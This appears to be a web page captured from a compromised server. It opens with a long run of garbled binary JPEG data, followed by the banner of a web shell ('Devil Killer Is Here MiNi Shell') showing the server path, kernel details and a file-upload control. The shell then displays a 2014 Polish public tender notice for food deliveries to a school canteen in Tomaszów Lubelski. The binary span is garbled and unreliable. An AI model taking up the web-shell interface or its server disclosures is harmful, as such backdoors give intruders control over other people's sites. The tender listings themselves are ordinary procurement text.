JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140729/253638-N-2014.html

<p class="kh_header"><b>Tomaszów Lubelski: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁOWKI SZKOLNEJ PRZY ZESPOLE SZKÓŁ NR 3 W TOMASZOWIE LUBELSKIM, ul. Hallera 5</b><br>
<b>Numer ogłoszenia: 253638 - 2014; data zamieszczenia: 29.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsnr3.odt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA SAMORZąDOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁOWKI SZKOLNEJ PRZY ZESPOLE SZKÓŁ NR 3 W TOMASZOWIE LUBELSKIM, ul. Hallera 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych do stołówki szkolnej przy internacie Zespołu Szkół nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5.
Przedmiot zamówienia został podzielony na 14 CZĘŚCI od nr I do XIV .

Wspólny słownik kodów CPV: 15000000-8
CZĘŚĆ   I  	PIECZYWO		Kod CPV 15612500-6	
CZĘŚĆ  II 	MLEKO I JEGO PRZETWORY Kod CPV 15500000-3	
CZĘŚĆ  III 	MIĘSO wieprzowe i wyroby wędliniarskie	Kod CPV 15100000-9,15131120-2
CZĘŚĆ  IV  RÓŻNE PRODUKTY SPOZYWCZE	Kod CPV 15800000-6
CZĘŚĆ  V 	RYBY PRZETWORZONE I KONSERWOWANEKod CPV 15200000-0
CZĘŚĆ  VI 	DRÓB		Kod CPV 15112000- 6
CZĘŚĆ  VII 	MROŻONKI 	Kod CPV 15331100-8
CZĘŚĆ  VIII 	OWOCE  ŚWIEŻE	kod CPV  03121000-5
CZĘŚĆ  IX 	WARZYWA 	Kod CPV 15300000-1 
CZĘŚĆ  X 	JAJA  KURZE	Kod CPV 03142500-3
CZĘŚĆ  XI 	PRODUKTY MĄCZNE  GOTOWE	Kod CPV 15851000-8
CZĘŚĆ  XII 	MAKARONY	Kod CPV 15850000-1
CZĘŚC  XIII      ZIEMNIAKI 	Kod CPV 03212100-1
CZĘŚĆ XIV       WARZYWA SEZONOWE świeże  	Kod CPV 0322000-9

Szczegółowy opis każdej części zawierają Arkusze kalkulacyjne oferty jako, załączniki    nr 1.1 do 1.14 do specyfikacji istotnych warunków zamówienia stanowiący integralną ich część..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.25.00-6, 15.50.00.00-3, 15.10.00.00-9, 15.80.00.00-6, 15.20.00.00-0, 15.11.20.00-6, 15.33.11.00-8, 03.12.10.00-5, 15.30.00.00-1, 03.14.25.00-3, 15.85.10.00-8, 15.85.00.00-1, 03.21.21.00-1, 03.22.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymaganego zapisem rozdz. VI, pkt 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymaganego zapisem rozdz. VI, pkt 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymaganego zapisem rozdz. VI, pkt 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymaganego zapisem rozdz. VI, pkt 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymaganego zapisem rozdz. VI, pkt 1.1 specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z uwzględnieniem zapisu art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2.Zakazana jest zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem ust. 3.
3. Dopuszczalne są następujące przypadki i warunki zmiany umowy :
1zmiany obowiązującej stawki VAT na artykuły wymienione w załączniku do umowy, przy czym zmianie ulegnie wyłącznie cena brutto wynikającej ze wzrostu urzędowej stawki podatku VAT cena netto pozostanie bez zmian. Zmiany te następują z mocy prawa i obowiązują od dnia obowiązywania odpowiednich przepisów. 
2każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego, jednak Zamawiający nie dopuszcza zmiany ceny netto na wyższą od oferowanej.
4.Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu,
5.Strony dopuszczają możliwość okresowych dostaw artykułów po cenie niższej niż określona w załączniku nr 1 do umowy tzw. promocja. Zmiany te nie wymagają potwierdzenia pisemnego w postaci aneksu do umowy.

Warunki tych zmian zostały określone we wzorze umowy - załączniku nr 6 do specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> //www.zsnr3.odt.pl/index.php?option=com_content&view=article&id=575:2014-07-26-07-59-30&catid=21<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego ; Zespół Szkół Nr 3 w Tomaszowie Lubelskim , ul. Hallera 5 , 22-600 Tomaszów Lubelski , sekretariat szkoły pokój nr 40.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2014 godzina 11:00, miejsce: Siedziba Zamawiającego , w sekretariacie Zespołu Szkół Nr 3 przy ul. Hallera 5 
pokój nr 40 /parter/  lub drogą pocztową na adres : Zespół Szkół Nnr 3, ul. Hallera 5, 22-600 Tomaszów Lub..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb  zwykły  krojony    waga nie mniej jak 500g 	szt.	9000
2	Chleb razowy mieszany waga nie mniej jak 500g	szt.	200
3	Bułka zwykła waga nie mniej jak  50 g	Szt.	16 000
4	Bułka tarta 	kg	    150
5	Drożdżówka 100 g	szt.	2500
6	Krokiet/ pasztecik / waga nie mniej jak 120 g szt.	2300
7	Pączek  waga nie mniej jak   60 g	szt.	500
8	Makowiec  500 g	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko spożywcze  zaw.2%  tł. w opak. 1 l.litr	4000
2	Śmietana zaw. 18 % tł.   litr	400 
3	Śmietana Kubek  op.450 ml zaw.18%  tł.	szt.	 140
3	Masło ex .zawartość tł. 82,5%   op. 0.200 g 	kg 	150 
4	Twaróg półtłusty 	Kg.	 450 
5	Ser topiony  100 g	Szt.	2500 
6	Ser żółty półtłusty	kg	250
7	Jogurt  kubek  op. nie mniej 125 ml. 	szt	3400 
8	Serek naturalny op. nie mniej jak 150 g	szt 	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.53.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mięso mielone wieprzowo-wołowe	kg.	550
	2	Mięso  wieprzowe gulaszowe  II  kl.kg.	600 
	4	Karkówka     wieprzowa b/k 	kg	250
	5	Karkówka z kością 	kg	50
	6	Schab  wieprzowy z kością 	kg.	550
	7	Schab wieprzowy b/k	kg	200
	7	Wątroba wieprzowa	kg.	70 
8.	8	Żeberka  wieprzowe (Paski) 	kg.	250 
9.	9	Smalec wieprzowy 	kg	5
10.	10	Boczek wędzony parzony	kg.	90 
11.	11	Baleron 	kg.	20
12.	12	Kiełbasa krakowska 	kg.	420
13.	13	Mielonka  wieprzowa Smaczek 	kg.	350
14.	14	Kiełbasa zwyczajna	kg.	50 
15.	15	Kiełbasa łopatkowa	kg.	20 
16.	16	Kiełbasa wiejska 	kg.	350
17.	17	Kiełbasa szynkowa z kminkiem 	kg	420
18.	18	Pieczeń rzymska 	Kg 	100
19.	1	Polędwica sopocka 	Kg 	320
20.		Ogonówka 	kg	420
21.	21	Paróweczki szynkowe wieprzowe 	kg	250
22.	22	Szynka parzona 	kg	300
23.	23	Kiełbasa golonkowa 	kg	50
24.	24	Flaki krojone odgotowane  	kg	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.12-0, 15.13.11.20-2, 15.11.30.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Cukier biały kryształ- paczkowany  op.1kg	1000	Kg
2.		Cukier puder op. 500 g	5	Szt.
3.		Chrzan  tarty w słoiku op.  Nie mniej jak  160 g	70	Szt
4.		Kakao ciemne holenderskie  sypkie  op. Nie mniej jak  100 60	Szt
5.		Dżem wiśniowy op.  nie mniej jak 280g	300	Szt 
6.		Dżem  truskawkowy , op. nie mniej jak  280 g	500	Szt
7.		Dżem  śliwkowy - nie mniej jak 280g 500	Szt
8.		Marmolada owocowa op. 500 g	50 Szt
9.		Fasolka konserwowa czerwona op.nie mniejsze jak 400g40	szt
10.		Fasolka konserwowa biała op. 400 g	30	Szt
11.		Groszek konserwowy  op. nie mniej jak  400 g  	120	Szt
12.		Gałka muszkatołowa mielona 20 g	10	Szt
13.		Herbata granulowana 100 g 	70	Szt
14.		Herbata  ekspresowa  op. zaw. 100 saszetek 	60	Op
15.		Kawa inka  op. nie mniejsze jak 150 g	75	Szt
16.		Keczup pikantny  op.  1000 g	40	Szt 
17.		Keczup PIKANTNY  op. nie mniej jak  500 g	260	Szt
18.		Koncentrat pomidorowy 30 % op. Nie mniej jak 200g 270	Szt
19.		Kukurydza konserwowa słodka  op. nie mniejsze jak 400 g 	120Szt
20.		Kwasek cytrynowy  op. Nie mniej jak 20g	70Szt 
21.		Majonez  dekoracyjny nie mniej  jak 700 g  Firmy Winiary
lub inny równoważny	120	Szt
22.		Musztarda  delikatesowa  op. nie mniej 180g	160	Szt
23.		Majeranek  torebka  op. 20g	90	Szt
24.		Miód naturalny wielokwiatowy op. słoik  1300 kg	20	Szt
25.		Ocet  spirytusowy 10 %  op. 05 l. 	10	Szt
26.		Przyprawa do zup w płynie  op. - 1 l  Firmy Winiar lub inny  równoważny 	130	Szt
27.		Pieprz naturalny czarny mielony Op. nie mniej jak 20g300	Szt
28.		Pieprz ziołowy torebka  op. 20 g	40	Szt
29.		Papryka w proszku słodka mielona Op.nie mniej jak 20G 180Szt
30.		Pietruszka susz-  natka op nie mniej jak 20g 	180	Szt
31.		Koper susz nać  op. nie mniej jak 20 g	100	Szt
32.		Przyprawa do potraw typu Vegeta lub inny równoważny op.200 g	160	Szt
33.		Ryż biały  op. 1 kg	150Kg
34.		Rosołki drobiowe  60 g Firmy Winiar lub inny równoważny 300	szt
35.		Sól kuchenna  spożywcza 160	Kg
36.		Ziele angielskie torebka 15g	10	Szt
37.		Liść laurowy  torebka 15 g	20	Szt
38.		Mąka ziemniaczana  op. 1000 g	20	Kg
39.		Mąka pszenna  luksusowa  typ 550  	350	Kg
40.		Olej jadalny rzepakowy  op. 1 litr	380	Szt
41.		Olej jadalny rzepakowy op. Nie mniej jak 3 l. 	20	szt
42.		Margaryna  śniadaniowa z zaw. Olejów roślinnych op. 500 g	1100	Szt
43.		Kasza jęczmienna  wiejska op.1000g	70Kg
44.		Kasza gryczana  op. 1000 g	130	Kg
45.		Płatki kukurydziane  zwykłe op. Nie mniej jak 425 g	100	Szt.
46.		Ogórek konserwowy  poj. 0.9 l	300	Szt
47.		Papryka konserwowa poj. 0,9 l 	260	Szt
48.		Serek top. Krążki  op. 140 g	1000	op
49.		Serek top. plastry op. 150g	1100	op
50.		Konserwa turystyczna  nie mniej jak  op. 135g	1200	Szt
51.		Pasztet drobiowy nie mniej jak op.135g 	1500	Szt
52.		Delikat do mięs Knor lub równoważny  op. 700 g	15	Szt
53.		Delikat do ryb op. 700g	3	Szt
54.		Delikat do drobiu op. 700 g	16	Szt
55.		Sos ogrodowy sałatkowy op.900 g	13	Szt
56.		Baton Snikers lub inny równoważny op. nie mniejsze jak 50 g 300	Szt
57.		Ciastka delicje op. nie mniej jak 140 g	200	Op
58.		Ciastka  pierniczki lukrowane op luz 	30	Kg 
59.		Cukierki czekoladowe   Wedell luz lub inny równoważny 30	Kg
60.	Czekolada   Wedel   op. 100 g  lub  równoważny  	500	Szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.00.00-3, 15.87.00.00-7, 15.83.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z ryby mrożony morszczuk SHP	Kg 	160
2	Filet śledziowy  b/skóry w zalewie  octowo-olejowej kg	80
3	Makrela wędzona 	Kg	100
4	Konserwa rybna śledz w pomidorach  op. nie mniej jak 170 gSzt.	250
5	Konserwa rybna szprot w pomidorach op. nie mniej jak 170 gSzt.	200
6	Paprykarz szczeciński op. 300 g	Szt.	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.24.00.00-2, 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet  drobiowy  świeży	Kg	360
2	Porcje rosołowe	Kg	130
3	Mięso świeże drobiowo - gulaszowe świeże Kg	250
4	Udka z kurczaka  świeża 	Kg	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mieszanka mrożona wielowarzywna 7 składnikowa Op.2,5 kgOp60
2	Kalafior mrożony Op.2.50 kg Op.30
3	Szpinak mrożony -  liść op.2.50 kg op 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8, 15.33.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OWOCE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jabłka  gat. I 	kg	1600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Burak ćwikła 	kg.	350
2	Cebula  biała	kg.	320
3	marchew	kg.	600
4	seler  (korzeń ) 	kg.	30
5	por 	kg.	40
6	Pietruszka korzeń 	kg.	15
7	Kapusta czerwona	kg.	65
